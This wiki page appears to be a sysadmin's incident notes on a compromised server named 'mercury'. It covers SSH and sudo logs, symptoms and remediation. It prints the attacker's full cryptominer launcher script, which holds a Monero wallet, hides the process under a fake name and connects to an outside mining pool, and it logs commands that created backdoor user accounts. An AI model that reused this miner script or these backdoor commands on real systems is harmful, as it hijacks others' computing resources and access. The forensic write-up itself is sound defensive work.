Solaris How To: Editing 2017-11 virus

===Warnings=== <pre> Nov 15 06:59:08 mercury sshd[28025]: Accepted password for www-data from 200.187.150.144 port 10248 ssh2 Nov 20 10:53:56 mercury sshd[9291]: Accepted password for www-data from 155.133.82.12 port 51625 ssh2 Nov 20 12:34:46 mercury sshd[12877]: Accepted publickey for www-data from 155.133.82.12 port 57274 ssh2 Nov 20 12:34:46 mercury sshd[12879]: Accepted publickey for www-data from 155.133.82.12 port 57280 ssh2 </pre> /var/www had a .ssh/ dated 2017-11-20, and this in authorized_keys mercury.bonmot.ca : Nov 20 10:54:15 : www-data : user NOT in sudoers ; TTY=unknown ; PWD=/var/www ; USER=root ; COMMAND=command /usr/sbin/useradd -s /bin/false -p "qqq” listd mercury.bonmot.ca : Nov 20 10:54:15 : www-data : user NOT in sudoers ; TTY=unknown ; PWD=/var/www ; USER=root ; COMMAND=echo "54e172662" | passwd --stdin listd mercury.bonmot.ca : Nov 20 10:54:16 : www-data : user NOT in sudoers ; TTY=unknown ; PWD=/var/www ; USER=root ; COMMAND=cat /etc/passwd it’s this code: https://forums.gentoo.org/viewtopic-t-1071762.html?sid=dd3123941f591f81c8ab5b8c4769dd1f ===Conclusions=== * It looks like either the www-data password was guessed, or was set by something running as www-data. ===Actions=== * Add "DenyUsers www-data" to /etc/ssh/sshd_config * delete /var/www/.ssh * create ~www-data/.ssh : ---------- 1 root root 0 Nov 28 08:19 .ssh ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDtS6xFlhMDBbJHpbeSKNbs3z3+tv/TEy3dOStR0DxNXNmHG0ub/yJWeV7+1fKW9U4Vmw5xyZAweAm8Firt9174tFViaPmGS/glWfxUcpdCRai7BjIWfxkFyxQVDSndtL3AJBm+0ekTrK+j8QRYzKzyvJUnfL3NSOvsH186ziaB6eTsBhWXUYAiU0y+2z6p/XYfzvs984IWOg/rLbeofRZSdU1Kx2g5Wix7UMS+Oi2UFwTFWvNWstkuNOLPg92DMaMiRgEKycwf1JfUrY8nWI7kwlJz/VO5rE9+J2o7ulI6eDWY5q7+zylKLg4bXnkS7wYYUfEPXobtNLgkZ5SUo6DD root@studiantes ===Symptoms=== * CPU at 100% * a process called md32 running * lots of processes named "b" running * files installed in /tmp/.s/ and /tmp/.b30/ * /tmp/b30.tar moved to ~daniel/ * Logfile "mata" looks like block mining * Notice a "wallet" config option below ===The Startup=== /tmp/.s/upd looks like: <pre> #!/bin/bash #[+] Miner v2.0 - 2017 #[+] Author: PRG @ #old UnderNet wallet="4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQtZ7SRLYc36Q2utLZ8" proc=`nproc` ARCH=`uname -m` HIDE="-bash" if [ "$ARCH" == "i686" ]; then ./h32 -s $HIDE ./md32 -a cryptonight -o stratum+tcp://xmr-eu1.nanopool.org:14444 -u $wallet -p x >>/dev/null & elif [ "$ARCH" == "x86_64" ]; then ./h64 -s $HIDE ./md -a cryptonight -o stratum+tcp://xmr-eu1.nanopool.org:14444 -u $wallet -p x >>/dev/null & fi echo $! > bash.pid 0 S www-data 18219 1 4 80 0 - 28841 futex_ 10:13 ? 00:00:19 -bash -a cryptonight -o stratum+tcp://xmr-eu1.nanopool.org:14444 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQtZ7SRLYc36Q2utLZ8 -p x </pre> --- mercury.bonmot.ca : Nov 27 23:21:30 : www-data : user NOT in sudoers ; TTY=unknown ; PWD=/var/www ; USER=root ; COMMAND=command /usr/sbin/useradd -s /bin/false -p "qqq" ircd mercury.bonmot.ca : Nov 27 23:21:46 : www-data : user NOT in sudoers ; TTY=unknown ; PWD=/var/www ; USER=root ; COMMAND=echo "266254e17" | passwd --stdin ircd mercury.bonmot.ca : Nov 27 23:22:01 : www-data : user NOT in sudoers ; TTY=unknown ; PWD=/var/www ; USER=root ; COMMAND=cat /etc/passwd mercury.bonmot.ca : Nov 28 02:36:29 : www-data : user NOT in sudoers ; TTY=unknown ; PWD=/var/www ; USER=root ; COMMAND=command /usr/sbin/useradd -s /bin/false -p "qqq" ircd mercury.bonmot.ca : Nov 28 02:36:43 : www-data : user NOT in sudoers ; TTY=unknown ; PWD=/var/www ; USER=root ; COMMAND=echo "266254e17" | passwd --stdin ircd mercury.bonmot.ca : Nov 28 02:36:57 : www-data : user NOT in sudoers ; TTY=unknown ; PWD=/var/www ; USER=root ; COMMAND=cat /etc/passwd

Summary:

This change is a minor edit.

To save this page you must answer this question:

What do you get when you remove the ARIS from Solaris?

Username: